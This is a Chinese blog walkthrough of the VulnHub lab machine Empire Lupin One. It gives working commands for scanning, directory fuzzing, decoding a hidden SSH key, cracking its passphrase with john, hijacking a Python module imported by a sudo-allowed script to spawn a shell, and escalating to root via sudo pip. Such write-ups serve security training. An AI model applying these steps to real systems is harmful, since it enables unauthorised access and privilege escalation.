靶机11 Empire Lupin One

已于 2023-11-15 16:14:42 修改
阅读量2k 收藏 3
点赞数
分类专栏: # 靶机 文章标签: 网络 安全 网络协议 压力测试
于 2022-10-09 17:16:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/honest_run/article/details/127230368
版权

总结

        本次靶机涉及信息泄露漏洞,系统配置漏洞,sudo 提权

        ffuf 工具暴力破解目录

        在线识别算法:https://www.dcode.fr/cipher-identifier

        ssh2john工具的使用

        使用 john 破解 hash

        sudo:pip提权

1、下载靶场

靶机名称:Empire Lupin One

下载地址:https://www.vulnhub.com/entry/empire-lupinone,750/

2、安装靶场

以DC-1为例,将文件解压(一压缩包形式进行下载)。

打开虚拟机,选择解压好的文件导入虚拟机( vof 版本高于4.0,点击重试即可导入)

导入成功,开启此虚拟机( 当页面出现 Lupin login 时表示安装成功)。

同时在靶机上可以看到 ip地址

1、已知kali的IP地址(ifconfig)

—— kali IP地址:192.168.108.129/24

2、DC-9和kali在同一网段 | 已知DC-9所在的网段

—— DC-9 IP地址:192.168.108.143/24

信息收集

进行端口扫描

命令:netdiscover -r 192.168.108.0/24

通过netdiscover发现同网段中存在的靶机IP地址(192.168.108.143)

命令:nmap -A -sS 192.168.108.143

分析:-A 全启用操作系统检测和版本检测;-sS SYN扫描,使用最频繁,安全,快;-O 启用操作系统检测

可以看到有两个服务(ssh:一般只能暴力破解,暂时没有合适的字典、http)以及系统版本(Linux 4.15 - 5.6)

端口

服务

版本

22

ssh    

OpenSSH 8.4p1 Debian 5 (protocol 2.0)

80

http   

Apache httpd 2.4.48 ((Debian))

进行目录扫描

命令:dirsearch -u "http://192.168.108.143"

得到了三个网页,目前我们有的URL如下:

http://192.168.108.143/

—— 大致看了一下应该是一个静态页面,没什么可以利用的地方

http://192.168.108.143/image/    

http://192.168.108.143/javascript/

http://192.168.108.143/manual/   

—— 发现了一个apache 2.4 服务器的帮助文档

使用别的工具试试(dirb http://192.168.108.143

得到了两url(http://192.168.108.143/robots.txt、http://192.168.108.143/server-status)

在这里又看到了一个 /~myfiles 的文件,猜测会不会有同样的文件

使用ffuf进行扫描,该工具用途广泛,可用于多种用途。一些用途:

  • 目录发现,可选择在 URL 中的任何位置进行模糊测试
  • 子域名发现
  • 使用各种 HTTP 方法进行模糊测试

命令:ffuf -c -w /usr/share/wordlists/dirb/common.txt -u 'http://192.168.108.143/~FUZZ'               

参数解释:

-c 有颜色输出

-w 指定字典

-u 指定暴力破解的目录,FUZZ 就是暴力破解的目录

发现了一个secret文件(http://192.168.108.143/~secret/)

发现应该是一个提示信息(大致意思应该是用户 icex64 在创建ssh的时候保留了一份私钥文件)

所以目前我们需要找到这个私钥文件,通过这个ssh的私钥直接使用用户 icex64 连接到靶机上面

继续使用ffuf工具进行扫描

命令:ffuf -c -w /usr/share/wordlists/dirb/common.txt -u 'http://192.168.108.143/.FUZZ'

命令:ffuf -c -w /usr/share/wordlists/dirb/common.txt -u 'http://192.168.108.143/.FUZZ' -e .txt,.html -fc 403

分析:-fc 过滤指定的返回状态码;-e 逗号分隔的扩展名列表。可以指定爆破的文件扩展名

换一个指定字典(/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt)进行尝试

命令:ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u 'http://192.168.108.143/~secret/.FUZZ' -e .txt,.html -fc 403

加密内容

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

将加密内容使用base58解码(http://www.metools.info/code/c74.html)后得到ssh的私钥

或者使用其他工具识别解码(https://www.dcode.fr/cipher-identifier)

将内容复制出来保存为文件ssh.txt

locate ssh2john #在 kali 中搜索 ssh2john工具,作用:ssh2john 可以转化ssh私钥为john可以破解的格式

/usr/bin/ssh2john ssh.txt > hash # 使用 ssh2john 转化ssh私钥为john可以破解的格式

john --wordlist=/usr/share/wordlists/fasttrack.txt hash # 使用 john 破解 hash

得到用户 icex64 的密码是 P@55w0rd!    

尝试ssh登录( icex64、P@55w0rd!)

ssh icex64@192.168.108.143 -i ssh.txt

chmod 600 ssh.txt #发现权限不够不能打开文件,增加权限

sudo -l 查看之后发现有一个python脚本可以在无密码的时候使用arsene用户的身份运行

User icex64 may run the following commands on LupinOne:

    (arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py

进入py脚本文件的目录下进行查看,打开一个txt文件,大意就是说使用这个代码可能会泄露账号和私密文件

可以看到heist.py脚本本身没有什么代码,但导入了一个模块:webbrowser

查看文件权限,发现可以修改,加入os.system ("/bin/bash") 获取shell

执行以下命令切换 shell:

sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py

这里第一次发现不成功,是因为使用echo插入的时候过滤掉了"",使用vi重新写入os.system ("/bin/bash")

重新切换shell,成功切换到arsene用户

sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py

使用 sudo 程序提权

访问:https://gtfobins.github.io/,查询 pip(https://gtfobins.github.io/gtfobins/pip/#sudo)

如果 sudo 允许二进制文件作为超级用户运行,则它不会删除提升的特权,并可用于访问文件系统、升级或维护特权访问

复制上面代码在 shell 中执行,成功提权,在 /root 目录下找到了flag(root.txt)

xjizhi(GG安全)
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub之Empire: LupinOne
weixin_64112307的博客
05-08 2280
前期准备: 靶机地址: https://www.vulnhub.com/entry/empire-lupinone,750/ kali机IP:192.168.132.129 靶机IP:192.168.132.128 运行环境:VMware 一、信息收集: 使用nmap进行对靶机进行扫描 nmap -sC -sV 192.168.132.128 -p- -n -vv -min-rate=2000 发现了22与80端口,在80端口下发现robots.txt和~myfiles 利用80端.
OWASP靶机安全学习、测试
05-24
这里提供的是owasp靶机的下载,下载后直接在虚拟机导入即可使用 OWASP靶机是一个开放式Web应用程序安全项目组织,旨在帮助计算机和互联网应用程序提供公正、实际、有成本效益的信息。在信息安全中OWASP TOP 10 是...
靶机渗透练习41-Empire Lupin One
hirak0的博客
04-18 1万+
靶机描述 靶机地址:https://www.vulnhub.com/entry/empire-lupinone,750/ Description Difficulty: Medium This box was created to be medium, but it can be hard if you get lost. CTF like box. You have to enumerate as much as you can. For hints discord Server ( https://d
VulnHub-Empire_ LupinOne靶机详细渗透过程
MRS_jianai的博客
12-28 1248
VulnHub-Empire: LupinOne靶机详细渗透过程
vulnhub-Empire: LupinOne
qq_43006864的博客
05-05 2188
Empire: LupinOne ~ VulnHub 靶机:EMPIRE: LUPINONE 攻击机: Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux 信息收集: 这里vmbox直接现实了地址,就不做网段扫描了。直接扫描目标网站的详细端口信息。 map -sS -sV -A -p- 192.168.1.109 目标网站: 22/80端口 r.
完整兼职项目——2500块接的外包Python项目
m0_59235699的博客
05-18 1万+
这次给大家带来的是一个2500的爬虫外包项目,在这里肯定有人说这个不值这么多,也有人会各种嘲讽。但是别忘了,人的眼界不一样,做事的决定自然会不同。 如果2500能给你带来25000的利润,那么你会选择毫不犹豫的支付吗?话不多说,看聊天记录,还是挺久以前做的了。(我后面再给大家一一道来,暂时先看咱们的教程。) 分析(x0) 进入目标网站:https://www.laifeng.com/ 随便进入一个分类,点击进入某直播间 当我们点击弹幕直播框时,它会要求咱们登录账号。这也实属正常,没办法那咱们就登录吧。
Empire_Lupin 靶场渗透记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
10-11 833
渗透首门功课先学linux,不懂命令,处处踩坑~
01-Empire-Lupin-One vulnhub靶场(ssh2john)
weixin_62621015的博客
03-18 336
01-Empire-Lupin-One vulnhub靶场详细通关记录
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
PWN靶机环境 网络安全
05-23
PWN靶机环境
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
《深入理解Android内核设计思想(第2版)(上下册)》之Android源码下载及编译...
weixin_33750452的博客
08-17 3405
本文摘自人民邮电出版社异步社区《深入理解Android内核设计思想(第2版)(上下册)》购书地址:item.jd.com/12212640.ht…试读地址:www.epubit.com.cn/book/detail… 第2章 Android源码下载及编译 在分析Android源码前,首先要学会如何下载和编译系统。本章将向读者完整地呈现Android源码的下载流程、常见问题以及处理方法,并从开发者的...
【Vulnhub靶场】EMPIRE: LUPINONE
DG_s1mple
02-13 3757
环境准备 下载镜像后导入到vmware,没啥好说的 发现题目已经给出了ip地址 攻击机IP地址:192.168.2.16 靶机IP地址为:192.168.2.17 信息收集 使用nmap扫描主机信息 发现靶机只开放了ssh跟http,我们先访问他的网站 只有一张图片,查看源代码也没有什么好的发现 开始渗透 我们扫描一下他的网站目录 发现有robots.txt,我们访问一下,发现有~myfiles文件夹 我们访问一下发现404,但是我们查看源代码发现 叫我们继续尝试,就是暗示我们还有别的文件夹,我
VulnHub靶场LupinOne
I夜白
02-01 4985
VulnHub靶场LupinOne 这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适 直接解压用虚拟机打开就行,不用自己配置,没有账号密码,需要自己一步步来,对了,这是自动获取IP的,不需要自己配置. 一.信息收集 信息收集是很重要的,举个栗子来说,比如约出自己的女神出来玩,肯定向了解女神的经济情况还有喜好嘛,通过她的微信朋友圈,她身边的好友,淘宝等等,了解一个人,就要从最贴近生活的方向开始,就像"只有千日做贼,那有千日防贼",感觉有点不太贴切,意思是差不多的,用这个只是想表达信息收集的重
项目实践系列-点击生成自定义设置的二维码
热门推荐
王定勇15993092872
11-23 4万+
目前为止,生活中的我们到处可见一些二维码,使用微信扫一扫即可进入到另一个网络空间,这种方式方便了我们的生活,更让我们可以适应这种方式。 那么今天呢,我就个人项目经历,把点击生成自定义设置的二维码的一个项目实践功能分享给大家,希望大家可以在看完有所收获,同时呢,我也加深一下项目印象,记录一下这次的项目实践。 话不多说,上代码! index.html: <!DOCTYPE html> <html> <head> ...
01 - Empire Lupin One
bobo_milk的博客
05-21 772
目录 一、信息收集 二、漏洞发现 三、权限提升 总结 一、信息收集 常规的主机发现以及端口扫描,扫描自己所在的网段。 nmap 192.168.216.0/24 nmap -A -v -T4 -p 1-65535 192.168.216.151 可以看到服务器开启了80端口,和22端口,22端口只能用来爆破,因此先查看一下80端口。 二、漏洞发现 访问80端口 没奇怪的地方,源代码也没有提示。 对网站进行目录扫...
CTF靶机 PowerShell Empire 笔记
z4yn:)的博客
08-28 310
PowerShell Empire 作为Red Primer系列的一部分,了解如何使用这个强大的开发后框架。 Nmap 扫一波端口 发现开放了个445端口,可以尝试用ms17-010 再用Nmap漏洞扫描一下 nmap --script vuln 10.10.241.65 启动MSF msfconsole use windows/smb/ms17_010eternalblue set rhosts 10.10.241.65 set payload windows/x64/meter
【Socket 编程】基于UDP协议建立多人聊天室
最新发布
稻草人敲代码的博客
07-19 356
对于服务端来说,除了要接收消息之外,还要实现一个路由转发模块,该路由转发模块可以将相应发送给所有连接的客户端。而对于客户端来说,除了要发送消息给聊天室,还要能实时看到其它所有客户端的消息。下面来看看具体实现的代码,代码只给出核心模块,其余代码模块代码可以借鉴我之前的博客。具体来说,服务器类实现的功能只有收消息。
doubletrouble靶机
08-29
doubletrouble靶机是一个用于渗透测试和漏洞挖掘的目标。它有两个不同的靶机地址。第一个地址是https://download.vulnhub.com/doubletrouble/doubletrouble.ova,可以下载一个ova文件来部署虚拟机。第二个地址是https://www.vulnhub.com/entry/doubletrouble-1,743/,可以获取更多有关靶机的描述信息。靶机中包含一个名为"doubletrouble"的数据库,其中有一个名为"users"的表。你可以使用sqlmap等工具对该表进行爆破和数据挖掘操作。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶场-DoubleTrouble](https://blog.csdn.net/qq_42947816/article/details/125739402)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [靶机渗透练习63-doubletrouble](https://blog.csdn.net/Perpetual_Blue/article/details/124289479)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值